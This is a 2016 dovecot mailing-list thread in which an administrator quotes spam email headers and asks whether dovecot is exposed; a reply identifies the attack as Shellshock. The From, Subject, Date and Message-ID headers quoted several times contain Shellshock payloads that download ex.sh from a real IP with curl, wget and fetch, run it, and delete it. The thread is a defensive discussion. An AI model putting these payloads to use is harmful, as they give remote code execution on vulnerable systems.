I found an interesting email that got caught in my spam quarantine. I?m
wondering if dovecot is vulnerable to this kind of code execution (I?m aware
that other components could be vulnerable, but this question is specifically
targeting dovecot).
The idea is to insert shell commands into various header fields that would get
executed as part of the message processing/delivery.
Examples include:
From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download
http: //62.75.175.145/ex.sh at nes.txt.com;,
wget at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;,
fetch at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, sh at nes.txt.com,
ex.sh at nes.txt.com;, rm at nes.txt.com, -fr at nes.txt.com,
ex.*'@nes.txt.com, &@nes.txt.com;
Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
The full message, should it be of interest, can be found here:
https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
Thank you!
--
Louis Kowolowski louisk at cryptomonkeys.org
Cryptomonkeys: http://www.cryptomonkeys.com/
Making life more interesting for people since 1977
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 801 bytes
Desc: Message signed with OpenPGP using GPGMail
URL:
<http://dovecot.org/pipermail/dovecot/attachments/20160127/061bfc0f/attachment-0001.sig>
Am 27.01.2016 um 21:10 schrieb Louis Kowolowski:> I found an interesting email that got caught in my spam quarantine. I?m wondering if dovecot is vulnerable to this kind of code execution (I?m aware that other components could be vulnerable, but this question is specifically targeting dovecot). > > The idea is to insert shell commands into various header fields that would get executed as part of the message processing/delivery. > > Examples include: > > From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download http: //62.75.175.145/ex.sh at nes.txt.com;, > wget at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, > fetch at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, sh at nes.txt.com, > ex.sh at nes.txt.com;, rm at nes.txt.com, -fr at nes.txt.com, > ex.*'@nes.txt.com, &@nes.txt.com; > > Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &; > > Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &; > > Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &; > > The full message, should it be of interest, can be found here: > > https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt > > Thank you! > -- > Louis Kowolowski louisk at cryptomonkeys.org > Cryptomonkeys: http://www.cryptomonkeys.com/ > > Making life more interesting for people since 1977Where had you been in 2014 when shellshock had been the big buzz? Alexander
> > On Jan 27, 2016, at 1:43 PM, Alexander Dalloz <ad+lists at uni-x.org> wrote: > > Am 27.01.2016 um 21:10 schrieb Louis Kowolowski: >> I found an interesting email that got caught in my spam quarantine. I?m wondering if dovecot is vulnerable to this kind of code execution (I?m aware that other components could be vulnerable, but this question is specifically targeting dovecot). >> >> The idea is to insert shell commands into various header fields that would get executed as part of the message processing/delivery. >> >> Examples include: >> >> From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download http: //62.75.175.145/ex.sh at nes.txt.com;, >> wget at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, >> fetch at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, sh at nes.txt.com, >> ex.sh at nes.txt.com;, rm at nes.txt.com, -fr at nes.txt.com, >> ex.*'@nes.txt.com, &@nes.txt.com; >> >> Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &; >> >> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &; >> >> Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &; >> >> The full message, should it be of interest, can be found here: >> >> https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt >> >> Thank you! >> -- >> Louis Kowolowski louisk at cryptomonkeys.org >> Cryptomonkeys: http://www.cryptomonkeys.com/ >> >> Making life more interesting for people since 1977 > > Where had you been in 2014 when shellshock had been the big buzz? >The system in question doesn?t have bash, and I?d already verified none of the other components were vulnerable. When I ran across this, I realized I hadn?t checked to ensure dovecot properly escaped things. -- Louis Kowolowski louisk at cryptomonkeys.org <mailto:louisk at cryptomonkeys.org> Cryptomonkeys: http://www.cryptomonkeys.com/ <http://www.cryptomonkeys.com/> Making life more interesting for people since 1977 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 801 bytes Desc: Message signed with OpenPGP using GPGMail URL: <http://dovecot.org/pipermail/dovecot/attachments/20160127/4aed199e/attachment.sig>